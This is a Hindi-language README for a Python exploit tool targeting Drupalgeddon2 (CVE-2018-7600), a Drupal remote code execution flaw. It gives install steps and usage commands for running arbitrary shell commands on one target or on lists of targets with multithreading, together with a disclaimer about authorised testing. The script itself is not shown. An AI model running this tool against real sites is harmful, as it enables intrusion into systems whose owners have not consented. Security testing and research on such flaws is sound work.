
यह रिपॉज़िटरी CVE-2018-7600 के लिए पूरी तरह से स्व-विकसित Proof-of-Concept (PoC) प्रदर्शित करता है, जिसे व्यापक रूप से Drupalgeddon 2 के रूप में जाना जाता है। Drupal 7 और 8 कोर में यह गंभीर भेद्यता रिमोट कोड निष्पादन (RCE) सक्षम बनाती है, और PoC इसका शोषण स्पष्ट और शैक्षिक तरीके से प्रदर्शित करता है।
इस रिपॉजिटरी में Drupal में महत्वपूर्ण रिमोट कोड निष्पादन भेद्यता के लिए Python-आधारित प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट शामिल है, जिसे Drupalgeddon2 (CVE-2018-7600) के रूप में जाना जाता है। यह स्क्रिप्ट शैक्षिक उद्देश्यों और अधिकृत पेनिट्रेशन परीक्षण परिदृश्यों में उपयोग के लिए सुरक्षा पेशेवरों के लिए डिज़ाइन की गई है।
यह टूल केवल कानूनी और नैतिक उद्देश्यों के लिए है। मालिक से स्पष्ट अनुमति के बिना किसी भी सिस्टम पर इस स्क्रिप्ट का उपयोग करना अवैध है। लेखक और योगदानकर्ता इस स्क्रिप्ट के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं हैं। अपने जोखिम पर उपयोग करें।
requests लाइब्रेरीcolorama लाइब्रेरीgit clone <repository-url>
cd <repository-directory>
pip install -r requirements.txt
(वैकल्पिक रूप से, उन्हें मैन्युअल रूप से स्थापित करें):
pip install requests colorama
यह स्क्रिप्ट अपने निष्पादन को अनुकूलित करने के लिए कई कमांड-लाइन तर्क प्रदान करती है।
डिफ़ॉल्ट कमांड (whoami) के साथ एकल लक्ष्य का एक्सप्लॉइट करें:
python3 drupalgeddon2.py -t http://example.com
कस्टम कमांड (जैसे, ls -la) के साथ एकल लक्ष्य का एक्सप्लॉइट करें:
python3 drupalgeddon2.py -t http://vulnerable-drupal.site -c "ls -la"
फ़ाइल से लक्ष्यों की सूची स्कैन करें:
targets.txt नामक एक फ़ाइल बनाएं जिसमें प्रत्येक पंक्ति में एक URL हो:
http://site1.com
https://site2.org
http://site3.net
फिर स्क्रिप्ट चलाएँ:
python3 drupalgeddon2.py -l targets.txt
कस्टम कमांड और अधिक थ्रेड्स के साथ सूची स्कैन करें:
python3 drupalgeddon2.py -l targets.txt -c "uname -a" -T 10
आउटपुट को लॉग फ़ाइल में सहेजें:
python3 drupalgeddon2.py -l targets.txt -o scan_results.log
| Argument | Short | विवरण | डिफ़ॉल्ट |
|---|---|---|---|
--target | -t | एकल लक्ष्य URL। | - |
--list | -l | लक्ष्य URL की सूची वाली फ़ाइल का पथ। | - |
--command | -c | लक्ष्य पर निष्पादित करने के लिए कमांड। | whoami |
--threads | -T | उपयोग करने के लिए समवर्ती थ्रेड्स की संख्या। | 5 |
--output | -o | आउटपुट लॉग करने के लिए फ़ाइल। | - |
--timeout | सेकंड में अनुरोध टाइमआउट। | 15 |